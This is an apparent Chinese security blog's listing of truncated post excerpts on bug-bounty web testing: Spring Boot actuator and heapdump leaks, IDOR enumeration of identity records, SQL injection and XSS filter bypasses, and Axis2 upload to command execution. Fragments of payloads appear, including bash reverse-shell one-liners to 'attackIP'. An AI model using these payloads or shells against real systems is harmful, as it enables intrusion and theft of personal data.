摘要:
测试发现spring boot actuator接口未授权访问: 之前写过用mat工具获取加密数据的明文,下面尝试通过jolokia接口获取明文数据: payload: {"mbean": "org.springframework.cloud.context.environment:name=env 阅读全文
摘要:
在某次SRC漏洞挖掘过程中,发现一个查看身份信息的接口: 通过证件号码去查询个人身份信息,这里测试发现可以查询任意证件号码的用户的身份信息(需要已知证件号,利用难度较大),分析下服务端响应包,看到有个accountId参数,这个参数的值我们可以遍历,将其作为请求参数发送一下: 发现可以正常查询到信息 阅读全文
摘要:
发现一个布尔型注入点: 判断库名长度: 首先想到可能处理了空格,简单fuzz下: 发现or (偶数个~) 也可以bypass,如下图: 就用这个进一步获取库名长度: 还是被拦截,猜测是处理了length()或database()函数,函数和括号之间可以拼接一些字符,fuzz如下: 利用注释换行符组合 阅读全文
摘要:
除了直接跟在网站根目录下的actuator接口,我们也需要关注一些二三级等目录,可能也会存在actuator接口泄漏,而且还可以利用shiro的权限绕过漏洞进行修复后的bypass(src刷洞必备) 访问https://xxx.xxx.xxx.xxx/xxx-identity/api/trace/ 阅读全文
摘要:
测试发现https://xxx.xxx.cn/actuator/heapdump/ 浏览器下载此文件,用Eclipse Memory Analyzer(MAT)打开,下载地址:https://www.eclipse.org/mat/downloads.php 类名输入PASS(大小写敏感)模糊搜索 阅读全文
摘要:
先吐槽一下:最近的项目到处是安全防护,漏洞越来越难挖(头秃😂) 第一次绕过很简单,过滤了常见标签和alert、confirm、prompt 很简单,直接利用js全局变量绕过(方法很多,在html标签属性内,也可以直接html编码) 我用的payload:" ><details ontoggle=s 阅读全文
摘要:
正常请求 单引号探测,返回空数据,直接'or'1'like'1探测: Content-type不同,注意观察下响应body内容也不同,前边两次响应结果中开始的leadId是1311744(可以作为sqlmap响应结果不同判断的一个依据),接下来比较简单了,这种基本就是java+mysql,通过函数简 阅读全文
摘要:
构造payload:str=1'--+&str=%0aand+sleep(2)--+,此处就是mysql的一个特性,注释符+换行符后的语句可以正常执行: 发现服务器延迟4s,我们给的的是sleep(2),多出了一倍 本地试验下: 查询结果为1条: 延迟2s: 查询结果为3条时: 延迟6s: 延迟次数 阅读全文
摘要:
方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp/atta 阅读全文
摘要:
实战遇到的情况 任意文件读取,读取/conf/axis2.xml内容,读取用户名和密码登录后台 1、上传cat.aar 命令执行 http://xx.xx.xx.xx/axis2/services/Cat/exec?cmd=whoami 2、获取classpath路径 http://xx.xx.xx 阅读全文